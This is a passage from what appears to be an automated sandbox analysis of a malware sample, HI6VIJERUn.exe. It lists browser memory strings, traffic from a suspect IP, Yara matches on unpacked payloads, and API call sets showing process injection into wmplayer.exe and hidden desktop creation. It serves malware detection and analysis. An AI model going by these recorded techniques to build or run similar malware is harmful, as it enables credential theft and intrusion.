                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                      Source: chrome.exe, 00000013.00000002.1878579894.0000422C00798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878623270.0000422C007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                      Source: chrome.exe, 00000013.00000002.1878579894.0000422C00798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878623270.0000422C007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
                      Source: chrome.exe, 00000013.00000002.1876010025.0000422C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                      Source: msedge.exe, 00000016.00000002.1905572634.0000341C002C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                      Source: msedge.exe, 00000016.00000002.1905572634.0000341C002C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                      Source: chrome.exe, 00000013.00000002.1878409482.0000422C00710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877373539.0000422C00494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                      Source: chrome.exe, 00000013.00000002.1878518613.0000422C00774000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877281886.0000422C00474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                      Source: chrome.exe, 00000013.00000002.1878518613.0000422C00774000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877281886.0000422C00474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                      Source: chrome.exe, 00000013.00000002.1878518613.0000422C00774000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877281886.0000422C00474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                      Source: chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                      Source: chrome.exe, 00000013.00000002.1876010025.0000422C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                      Source: msedge.exe, 00000016.00000002.1905572634.0000341C002C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                      Source: chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/4
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                      Source: chrome.exe, 00000013.00000002.1875052211.0000422C00078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                      Source: chrome.exe, 00000013.00000002.1875052211.0000422C00078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                      Source: unknown HTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49747 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49751 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49767 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49784 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49811 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49827 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49844 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49860 version: TLS 1.2
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exe Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050F9
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044D1
                      Source: Hop.com, 0000000E.00000003.1669870508.0000024368900000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_120a729e-1
                      Source: Hop.com, 0000000E.00000003.1669870508.0000024368900000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_f612f6dd-1
                      Source: Yara match File source: 15.3.svchost.exe.1c2785c0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 14.3.Hop.com.24368620000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 14.3.Hop.com.24368900000.5.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 15.3.svchost.exe.1c2785c0000.5.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 15.3.svchost.exe.1c2782e0000.4.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 14.3.Hop.com.24368900000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 15.3.svchost.exe.1c2782e0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0000000F.00000003.1676222039.000001C2785C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000E.00000003.1669870508.0000024368900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000E.00000003.1669666676.0000024368620000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: Hop.com PID: 4120, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: svchost.exe PID: 4188, type: MEMORYSTR
                      Source: C:\Windows\System32\svchost.exe Code function: 15_3_00007DF426AB08CC CreateDesktopW,CreateProcessW,GetExitCodeProcess,TerminateProcess, 15_3_00007DF426AB08CC
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com Code function: 14_2_00000243665E64C0 NtQuerySystemInformation,NtQuerySystemInformation,GetTokenInformation,CloseHandle,CloseHandle, 14_2_00000243665E64C0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com Code function: 14_2_00000243665E8AE0 NtQuerySystemInformation,malloc,NtQuerySystemInformation,K32GetProcessImageFileNameW, 14_2_00000243665E8AE0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com Code function: 14_2_00000243665E5FA0 NtQueryInformationProcess, 14_2_00000243665E5FA0
                      Source: C:\Windows\System32\svchost.exe Code function: 15_3_00007DF426ABE3E8 NtAcceptConnectPort, 15_3_00007DF426ABE3E8
                      Source: C:\Windows\System32\svchost.exe Code function: 15_3_00007DF426ABE3C8 NtAcceptConnectPort, 15_3_00007DF426ABE3C8
                      Source: C:\Windows\System32\svchost.exe Code function: 15_3_00007DF426ABE25C NtAcceptConnectPort, 15_3_00007DF426ABE25C
                      Source: C:\Windows\System32\svchost.exe Code function: 15_3_00007DF426ABF180 RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,free, 15_3_00007DF426ABF180
                      Source: C:\Windows\System32\svchost.exe Code function: 15_3_00007DF426ABF32C calloc,NtAcceptConnectPort, 15_3_00007DF426ABF32C
                      Source: C:\Windows\System32\svchost.exe Code function: 15_3_00007DF426AC0344 NtAcceptConnectPort,CreateThread,TerminateThread,free, 15_3_00007DF426AC0344
                      Source: C:\Windows\System32\svchost.exe Code function: 15_3_00007DF426AC0280 NtAcceptConnectPort, 15_3_00007DF426AC0280
                      Source: C:\Windows\System32\svchost.exe Code function: 15_3_00007DF426ABE170 NtAcceptConnectPort, 15_3_00007DF426ABE170
                      Source: C:\Windows\System32\svchost.exe Code function: 15_3_00007DF426ABE150 NtAcceptConnectPort, 15_3_00007DF426ABE150
                      Source: C:\Windows\System32\svchost.exe Code function: 15_3_00007DF426ABE094 NtAcceptConnectPort, 15_3_00007DF426ABE094
                      Source: C:\Windows\System32\svchost.exe Code function: 15_3_00007DF426ABFEE8 NtAcceptConnectPort,malloc,NtAcceptConnectPort,K32GetProcessImageFileNameW, 15_3_00007DF426ABFEE8
                      Source: C:\Windows\System32\svchost.exe Code function: 15_3_00007DF426ABE910 calloc,DuplicateHandle,NtAcceptConnectPort,free,NtAcceptConnectPort,NtAcceptConnectPort, 15_3_00007DF426ABE910
                      Source: C:\Windows\System32\svchost.exe Code function: 15_2_000001C276405FA0 NtQueryInformationProcess, 15_2_000001C276405FA0
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 35_3_00007DF4F81A1958 calloc,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory, 35_3_00007DF4F81A1958
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 35_3_00007DF4F81A1CE8 calloc,CreateProcessW,NtResumeThread,CloseHandle,free, 35_3_00007DF4F81A1CE8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 35_2_0000021AB2FE3158 NtAcceptConnectPort, 35_2_0000021AB2FE3158
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 35_2_0000021AB2FE290C NtAcceptConnectPort, 35_2_0000021AB2FE290C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 35_2_0000021AB2FE2A20 NtAcceptConnectPort, 35_2_0000021AB2FE2A20
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 35_2_0000021AB2FE2DAC NtAcceptConnectPort, 35_2_0000021AB2FE2DAC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 35_2_0000021AB2FE2D80 NtAcceptConnectPort, 35_2_0000021AB2FE2D80
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 35_2_0000021AB2FE2EC8 NtAcceptConnectPort, 35_2_0000021AB2FE2EC8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 35_2_0000021AB2FE2E84 NtAcceptConnectPort, 35_2_0000021AB2FE2E84
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 35_2_0000021AB2FE2DDC NtAcceptConnectPort, 35_2_0000021AB2FE2DDC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 35_2_0000021AB2FE2CAC NtAcceptConnectPort, 35_2_0000021AB2FE2CAC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 35_2_00007DF4F81A199C calloc,NtQueryInformationProcess,NtReadVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory, 35_2_00007DF4F81A199C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 35_2_00007DF4F81A1E64 CreateProcessW,NtResumeThread,CloseHandle, 35_2_00007DF4F81A1E64
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 35_2_00007DF4F81B25D4 NtQuerySystemInformation,free,NtQuerySystemInformation, 35_2_00007DF4F81B25D4
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 35_2_00007DF4F8202E90 NtQuerySystemInformation,malloc,NtQuerySystemInformation, 35_2_00007DF4F8202E90
                      Source: C:\Windows\System32\dllhost.exe Code function: 36_2_000001F269C73970 NtQuerySystemInformation, 36_2_000001F269C73970
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exe Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 0_2_004038AF
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exe File created: C:\Windows\WhatMed
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exe File created: C:\Windows\SessionDeviation
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exe File created: C:\Windows\PurpleCutting
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278309E2015_3_000001C278309E20
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830960915_3_000001C278309609
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FBE1815_3_000001C2782FBE18
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830868015_3_000001C278308680
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783EDEBC15_3_000001C2783EDEBC
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FB6B415_3_000001C2782FB6B4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830B6B015_3_000001C27830B6B0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278325E9415_3_000001C278325E94
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27831B6D415_3_000001C27831B6D4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FD6D815_3_000001C2782FD6D8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783EEED415_3_000001C2783EEED4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782F06E015_3_000001C2782F06E0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783D8F2015_3_000001C2783D8F20
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278317F7C15_3_000001C278317F7C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830E78015_3_000001C27830E780
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278308F7015_3_000001C278308F70
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782ED74815_3_000001C2782ED748
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782ECF6015_3_000001C2782ECF60
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782E4F5C15_3_000001C2782E4F5C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783227B215_3_000001C2783227B2
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27835F7AC15_3_000001C27835F7AC
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FC79015_3_000001C2782FC790
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830F7F415_3_000001C27830F7F4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830500015_3_000001C278305000
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783D5FD815_3_000001C2783D5FD8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783037E015_3_000001C2783037E0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782F6FE015_3_000001C2782F6FE0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FA83015_3_000001C2782FA830
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782F904015_3_000001C2782F9040
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FE02815_3_000001C2782FE028
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783E802815_3_000001C2783E8028
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782E280415_3_000001C2782E2804
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782F685015_3_000001C2782F6850
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782E984815_3_000001C2782E9848
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783150A015_3_000001C2783150A0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783EB08C15_3_000001C2783EB08C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783230C715_3_000001C2783230C7
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783080D015_3_000001C2783080D0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782E214015_3_000001C2782E2140
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27831992C15_3_000001C27831992C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27832591415_3_000001C278325914
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27831592015_3_000001C278315920
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830198015_3_000001C278301980
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FD16415_3_000001C2782FD164
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27837B15C15_3_000001C27837B15C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27607099815_3_000001C276070998
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426ACD42C15_3_00007DF426ACD42C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426A9286C15_3_00007DF426A9286C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AB08CC15_3_00007DF426AB08CC
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7E5F415_3_00007DF426B7E5F4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AE564015_3_00007DF426AE5640
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7757815_3_00007DF426B77578
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B8A59815_3_00007DF426B8A598
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7D75C15_3_00007DF426B7D75C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B1071C15_3_00007DF426B1071C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B3A3C815_3_00007DF426B3A3C8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B723D815_3_00007DF426B723D8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B013BC15_3_00007DF426B013BC
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B0D24815_3_00007DF426B0D248
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AA21F015_3_00007DF426AA21F0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7A19C15_3_00007DF426B7A19C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AE52F415_3_00007DF426AE52F4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B832F815_3_00007DF426B832F8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AFD2A015_3_00007DF426AFD2A0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426A9105815_3_00007DF426A91058
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426A95F9C15_3_00007DF426A95F9C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AEFF7815_3_00007DF426AEFF78
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AB10BC15_3_00007DF426AB10BC
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7E0B015_3_00007DF426B7E0B0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AFCE4815_3_00007DF426AFCE48
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B8DF6C15_3_00007DF426B8DF6C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AB0EF415_3_00007DF426AB0EF4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7BC6815_3_00007DF426B7BC68
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B6DBC815_3_00007DF426B6DBC8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AE6BE415_3_00007DF426AE6BE4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426ABCBE815_3_00007DF426ABCBE8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AEECF815_3_00007DF426AEECF8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AFCD3815_3_00007DF426AFCD38
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AECC8415_3_00007DF426AECC84
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AE3CE815_3_00007DF426AE3CE8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7DC9415_3_00007DF426B7DC94
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B319B415_3_00007DF426B319B4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426A9F9C015_3_00007DF426A9F9C0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AD8B2815_3_00007DF426AD8B28
